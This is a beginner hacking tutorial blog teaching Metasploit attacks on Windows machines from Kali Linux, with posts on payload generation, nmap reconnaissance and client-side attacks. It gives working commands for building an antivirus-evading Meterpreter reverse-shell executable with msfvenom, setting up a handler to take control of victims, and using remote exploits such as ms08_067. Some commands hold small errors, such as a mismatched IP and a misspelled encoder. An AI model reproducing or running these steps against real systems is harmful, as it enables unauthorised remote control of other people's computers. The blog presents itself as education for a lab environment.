Client Side Attacks

If you are viewing this post then you should atleast got your own kali linux machine with you.
Assuming that you got your machine with you I was not uploading any reference Images.

As already mentioned

Attackers IP :10.4.33.3 [kali linux OS]

Victims IP    :10.4.33.8  [ Any Windows OS, use xp or 7 for  less complications]

The payload we use is windows/meterpreter/reverse_tcp

We already seen how to generate a payload but for now we are using msfvenom for creating a payload as it was a new update in kali linux 2 sana version.

Type this command in root terminal msfvenom -h

msfvenom

By looking the above help table we can create a payload

-p :specifying our payload

-a :arch

–platform : For mentioning the victims OS

-e : encoder, evading a infamous or unpaid antivirus system including windowsdefender

-f : format of the output file it may be .bat or .exe for windows .elf for linux etc.

-o : To save the output file at a defined location

Now getting our payload
I already mentioned you that there will be a several variables in a payload that are need to be defined before generating it.
You can know about those variables in metasploit by using the command show options

Finding Variables

  • Terminal 1

msfconsole

use exploit/multi/handler

use payload windows/meterpreter/reverse_tcp

show options 

Now you can see the list of variables needed ie LHOST LPORT.

Keep this terminal open we will get to this terminal again

Open up a new terminal and use this command for creating a payload

  • Terminal 2

msfvenom -p windows/meterpreter/reverse_tcp -a x86 –platform windows LHOST=10.4.33.4 LPORT=3456 -e x86/shikta_ga_nai -f exe -o /root/Desktop/payload.exe

Here LHOST = our ip we can find it by using a terminal command [ifconfig]

LPORT = any port but remember the port.

After running this command successfully you can see a payload.exe file on your desktop.

Now you can close this second terminal.

Come back to our Terminal 1

msfconsole

use exploit/multi/handler

use payload windows/meterpreter/reverse_tcp

show options      [till here it was done already]

set LHOST 10.4.33.3    [our IP not the victims IP]

set LPORT 3456   [this is the reason we need to remember the port we used before]

set ExitOnSessions false   [Adavanced command no need to use, but its better if the attck was going on several machines]

exploit or exploit -j 

Remember if you use the -j [jobs tag] the meterpreter session will not be displayed directly, it will be assigned in a serial way to each session.
like first victim to session 1 and next to session 2 and follows.

So in the same terminal you need to use this extra command sessions -i 1 for interacting with 1 session ie operating 1 victim.

For this to be happen, the payload.exe file should be run in the victims PC, sending that file to the victims PC is One of a different task, but for now to get some information you just upload it in the victims PC and Run the file.

Terminal 1 should not be closed as that is the terminal of victim now after all these commands in an order.

It should look like this.

finalg

Here according to this image 192.168.222.135 is attacker and 192.168.222.137 is the victim.

And now you can see the meterpreter terminal, if you can see that, which means the PC with the IP above was now under your control.
It was hacked you can do what ever you want.

But disadvantages of this way

  1. We need to deliver the payload to victim [payload.exe] .
  2. A good antivirus can detect this.
  • Evading Antivirus Detection

you can evade almost any antivirus by creating your payload from veilevasion

there will be a different blog for that.

  • Delivering the Payload

This has some awesome techniques to do, but for now just send the files by your own

I can mention you some of the exploits that doesn’t need to deliver the payload

  1. exploit/windows/dcerpc/ms03_026_dcom [dcerpc vulnerability]
  2. exploit/windows/smb/ms08_067_netapi   [smb vulnerability]

But these are vulnerability specific  and both had a common variable RHOST , where you need to set the RHOST to 10.4.33.8 ie set RHOST 10.4.33.8 [victims ip]

There are some exploits that can be attached to PDFs and XL files

exploit/windows/fileformat/adobe_utilprintf

It varies according to the situation but what my aim is to not let you in any confusion and misconception.

Doubts and suggestions can be commented below.

 

Advertisements

Vulnerability Scanning

Vulnerability Scanning is to finding a  payload for attacking a machine.

What we do now is the very important phase in hacking, It may look easy here but this is the difficult path, this is the place a real time hacker writes his own code.

When should a hacker write his own code and when he should use tools ?

How can we find a suitable payload ?

There is no need of writing code every time, first check for the vulnerabilities it got if it is highly secure and the most updated and The God Pc or You need to do something unusual which was never done before like Ransomewhere or wannacry virus then you should write your own code.

So, Our first thing is to find any vulnerabilities are present or not, for that purpose there are many ways, but one of my favorite way is by using a too Nmap.

Nmap is one of the best scanner, that gives information of a System by the ports it was using and it can even tell us what os the victims machine was.

From now on wards,

Attackers IP : 10.4.33.3

Victims IP :     10.4.33.8

Remember the victims IP can be 10.9.1.19, 172.16.101.104, 172.16.48.38 from different gateway but same private network .

Now we need to find Information about the PC which was assigned an IP 10.4.33.8.

The following commands in terminal give you a lot of information

nmap -sS 10.4.33.8 lists out the ports that are open nmap 1

Forget about the IP in the above picture[replace it with your victims ip]

now you can see a lot of ports open and the services it got like

22 port – SSH

23 port – telnet

now using the command nmap -sv 10.4.33.8 gives you the information about the version of the services our victim was using.
recently we got an exploit for openssh 5.3 so you can upload that payload into metasploit and fill the required variables like RHOST LHOST RPORT LPORT VERBOSE  and use it as an remote exploit. But you may find it to be latest updated version for many reasons.

Now what to do ?

OS scan you can scan OS by using the command nmap -O -Pn 10.4.33.8

-O : Detect which OS

-Pn : Think the system is alive dont just skip it by a normal ping test.

nmap 2

nmap 3

This is how we get the information about our Victims machine there are many ways to find information, It varies according to the location and position of the victims machine.

If you got a different scenario and was not able to find a way just give me some information I will guide you to get knowledge and this is for educational purpose only, It should be your lab environment only.

In the next post we will be using a common way for hacking any windows machine which is enabled with antivirus and disabled with anti virus.

Doubts and suggestions can be commented below.

 

Metasploit Fundamentals

  • Basic commands of Metasploit
  • Payload types
  • Generating payloads in Metasploit

Basic Commands of Metasploit

In this article we will be talking about the very basics of Metasploit and the Metasploit commands used in the command line interface.

Before Knowing the commands of metasploit first be aware about your system updates, These are some necessary commands to update your OS.
apt-get update

apt-get upgrade

apt-get dist-upgrade

Dont ever try to update metasploit with the command Msfupdate whithout knowing what you are going to do.

You can open metasploit by using the terminal command msfconsole which will open up with a metasploit banner as belowmsfconsole

Now we are in msfconole which can be nicknamed as metasploit terminal or console,
every command related to metasplot should be executed here.
list of some commands and what they do.

*every command will be bold and Italic [ command ] in this blog

help

You can further refine your searches by using the built-in keyword system.help

set

The ‘set’ command allows you to configure Framework options and parameters for the current module you are working with.

set

auxiliary

Executing ‘show auxiliary’ will display a listing of all of the available auxiliary modules within Metasploit. As mentioned earlier, auxiliary modules include scanners, denial of service modules, fuzzers, and more.

auxilary

exploits

Naturally, ‘show exploits’ will be the command you are most interested in running since at its core, Metasploit is all about exploitation. Run ‘show exploits’ to get a listing of all exploits contained in the framework.

exploits

Payloads

Running ‘show payloads’ will display all of the different payloads for all platforms available within Metasploit.

payload

use

The ‘use’ command changes your context to a specific module, exposing type-specific commands.

use

exit 

This command takes back to your root terminal or the default terminal.

exit

These are some basic commands.

Now how to use an exploit in metasploit, assuming we know what exploit we want to use. In further we will discuss what are the very useful and commonly used exploits.

use  exploit/windows/smb/ms09_050_smb2_negotiate_func_index 

This is the exploit and use the command ‘use’ to select it then you can see some considerable changes in the msfconsole in a way that a particular exploit was selected.

followed by these commands to clear if any necessary and set them with the set command

show targets : provides you the info about what type of machine can be attacked

show payload : Show you the list of payloads that will be valid for this chosen exploit

Now set  the required payload with the set command from the list of shown payloads from the command show payload . 

exset payload windows/meterpreter/reverse_tcp          where “windows/meterpreter/reverse_tcp” is one of the payloads in the list of show payload.

show options : After setting the payload, this command will provide you the info about the necessary details required to fill the variable that are present in our selected payload.

ex : If “x” is a variable that should be fulfilled our payload before execution,                  show options will provide you a info about “x” by using this you will never struck in an error before executing the code.

show advanced : Similar to show options but some advanced, but without setting this will not lead to any error.

show evasion ; Similar to show options.

  • Payload types.

There are many types of payload

  1. Inline (Non Staged)
  2. Staged
  3. Meterpreter
  4. PassiveX
  5. NoNX
  6. Ord
  7. Ipv6
  8. Reflection Dll Injection

All these types are not necessary to explain now, But if someone is interested you can contact me.

For now we will just concentrate with the Meterpreter type payloads.

 Meterpreter :The short form of Meta-Interpreter is an advanced, multi-faceted payload that operates via dll injection. The Meterpreter resides completely in the memory of the remote host and leaves no traces on the hard drive, making it very difficult to detect with conventional forensic techniques. Scripts and plugins can be loaded and unloaded dynamically as required.

  • Generating Payloads in Metasploit

Payloads can be generated in Metasploit by the following commands from your root terminal

  1. msfconsole  : Takes us to metasploit termnal from root terminal
  2. search payload : Lists us a lot of payload and select a useful payload for your attack, you can learn about payloads later, for now we are using some random payload.
  3. use payload/windows/shell_bind_tcp : After selecting a payload select it by using the command ‘use’
  4. generate : Which will generate you a raw code which can be even generated in many ways by using the command below.
  5. By using tags of generate -h which will list you a lot of external tags similar to “-h”

You can even generate payloads in many ways,you can use socialengineeringtoolkit, the command for that is setoolkit in root terminal, but the way we generate is a bit different.

There are many other external ways too,

like Veilevasion, this is on of the greatest way to create an antivirus undetected payload, we will look about these in detail later.

I guess for now you are able to create your own payload given the name of the payload, remember some payloads need to be filled with the necessary variables, so never forget to use the command show options after selecting the payload, In the previous generated payload by us there are no any predefined variables so, I never checked it.

After a lot of practice and usage you will be capable of selecting a payload just with the situation and you will be aware of the variables too.

My contact details.
gmail: kaparapu.akhilnaidu@gmil.com

facebook: https://www.facebook.com/kaparapu.akhilnaidu

For any doubts and suggestions comment below.

Introduction

  • Requirements
  • Metasploit Modules

Requirements

Before we Learn to use Metasploit we should prepare our Metasploit Lab Environment, Preparing a Lab environment will help us to locate our problem or mistake easily as it is very much ordered and you know whats going on.

Lab environment doesn’t mean you need to have a different PC’s or laptops, you can even create a lab environment with your only laptop or PC ensuring that it meet or exceed the following system requirements.

we are using a virtual machine, you can find a lot of videos online how to get the free vmware and install both kali linux and windows operating system in a single PC.
If there is a problem in Installing you can comment below.

Minimum of 30Gb of space for your kali linux Operating system and  The bare minimum requirement for VMware Player is a 400MHz or faster processor (500MHz recommended). The more horsepower you can throw at it, of course, the better. Finally a decent Internet connection.

Metasplot Modules

The metasploit Framework is composed of many modules like Exploits,Payloads,Encoders,Nops

  • Exploits 

Defined as the modules that use payloads

An exploit without a payload is an Auxiliary module

  • Payloads,Encoders,Nops

Payloads consist of code that runs remotely

Encoders ensure that payloads make it to their destination

Nops keep the payload sizes consistent

Loading Additional Module Trees
Metasploit gives you the freedom to load modules either at runtime or after msfconsole has already been started. Pass the -m option when running msfconsole to load at runtime.

See you again with Metasploit Fundamentals, doubts and suggestions can be commented below.

 

Network and Security

This Blog is to guide you in a right direction for your future in Network and security related career.
I got many personal emails asking me to write a  blog after my YouTube channel was blocked, At that time It is a bit more work for me to write a blog without any preparation, So I started exploring more and more on cyber security, I used to attend a lot of workshops conducted all over India and myself I conducted a series of workshops in IIT Guwahati.

As for now I can start my own series of lectures through this blog.
In this lecture series we will be Using Kali linux as Our operating System [Attacker machine] and Windows operating system [Victim]

Our First Lecture is on Metasploit

This Post will be updated regularly with a direct link below within the index itself.

Doubts and suggestions can be commented below.